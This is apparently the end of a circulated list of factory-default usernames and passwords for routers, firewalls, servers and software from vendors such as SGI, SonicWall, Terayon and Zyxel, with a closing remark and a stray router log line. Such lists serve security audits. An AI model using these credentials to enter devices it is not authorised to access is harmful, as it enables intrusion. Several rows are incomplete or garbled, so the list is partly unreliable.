PlainTree 	Waveswitch 100 	- 	- 	default.password
RapidStream 	RS4000-RS8000 	Linux 	rsadmin 	rsadmin
realtek 	8139 	- 	- 	-
Remedy 	Any 	Any 	Demo 	-
Research Machines 	Classroom Assistant 	Windows 95 	manager 	changeme
Rodopi 	Rodopi billing software 'AbacBill' sql database 	- 	rodopi 	rodopi
Samba 	SWAT Package 	Linux 	Any Local User 	Local User password
schoolgirl 	member 	- 	ich 	hci
Securicor3NET 	Monet 	any 	manager 	friend
Securicor3NET 	Cezzanne 	any 	manager 	friend
SGI 	all 	all 	root 	n/a
SGI 	Embedded Support Partner 	IRIX 6.5.6 	Administrator 	Partner
SGI 	IRIX 	ALL 	lp 	lp
SGI 	IRIX 	ALL 	OutOfBox, demos, guest, 4DGifts 	(none by default)
SGI 	IRIX 	ALL 	EZsetup 	-
Shiva 	LanRover 	any? 	root 	-
Shiva 	AccessPort 	Any 	hello 	hello
Shiva 	Any? 	- 	Guest 	blank
SMC 	Barricade 	- 	- 	admin
soho 	nbg800 	unknown 	admin 	1234
Solaris 	- 	- 	- 	-
sonic wall 	any firewall device 	admin 	password 	-
SonicWall 	Any Firewall Device 	- 	admin 	password
SpeedStream 	- 	- 	- 	-
Spider Systems 	M250 / M250L 	- 	- 	hello
Sprint PCS 	SCH2000 	see notes 	Menu - 8 - 0 (see notes) 	040793
Ssangyoung 	SR2501 	- 	- 	2501
Sun 	- 	SunOS 4.1.4 	root 	-
Sun 	- 	Solaris 	- 	-
surecom 	ep3501/3506 	own os 	admin 	surecom
Symnatec 	- 	- 	- 	-
SysKonnect 	6616 	- 	default.password 	-
Tekelec 	Eagle STP 	- 	eagle 	eagle
Telebit 	netblazer 3.* 	- 	setup/snmp 	setup/nopasswd
Terayon 	TeraLink Getaway 	- 	admin 	password
Terayon 	TeraLink 1000 Controller 	- 	admin 	password
Terayon 	TeraLink 1000 Controller 	- 	user 	password
Terayon 	TeraLink Getaway 	- 	user 	password
terayon 	- 	6.29 	admin 	nms
Terrayon 	- 	- 	- 	-
Titbas 	- 	SCO 	haasadm 	lucy99
TopLayer 	AppSwitch 2500 	Any 	siteadmin 	toplayer
Toshiba 	TR-650 	V2.01.00 	admin 	tr650
toshiba 	480cdt 	- 	- 	-
toshiba 	- 	- 	- 	-
TrendMicro 	ISVW (VirusWall) 	any 	admin 	admin
Trintech 	eAcquirer App/Data Servers 	- 	t3admin 	Trintech
USR 	TOTALswitch 	Any 	none 	amber
Vina Technologies 	ConnectReach 	3.6.2 	(none) 	(none)
voy 	- 	- 	- 	-
WatchGuard 	FireBox 	3-4.6 	- 	wg (touch password)
Webmin 	Webmin 	Any Unix/Lin 	admin 	-
Webramp 	410i etc... 	- 	wradmin 	trancell
Win2000 	Quick Time 4.0 	Englisch 	- 	-
Windows 98 se 	98 se 	- 	- 	-
Wireless Inc. 	WaveNet 2458 	n/a 	root 	rootpass
Xylan 	Omnistack 1032CF 	3.2.8 	admin 	password
Xylan 	Omnistack 4024 	3.4.9 	admin 	password
Xylan 	Omniswitch 	3.1.8 	admin 	switch
xyplex 	mx-16xx 	- 	setpriv 	system
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	1234
zyxel 	prestige 300 series 	zynos 2.* 	- 	1234
Zyxel 	ISDN Router Prestige 100IH 	- 	- 	1234
Zyxel 	prestige 300 series 	any 	- 	-
Zyxel 	prestige 600 series 	any 	- 	-
ZYXEL 	641 ADSL 	- 	- 	1234
Zyxel 	prestige 128 modem-router 	any 	- 	1234
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	-

I hope they are useful to someone


LOG

Nov/02/2006 15:38:05 Wireless PC connected 00-11-24-22-A9-AE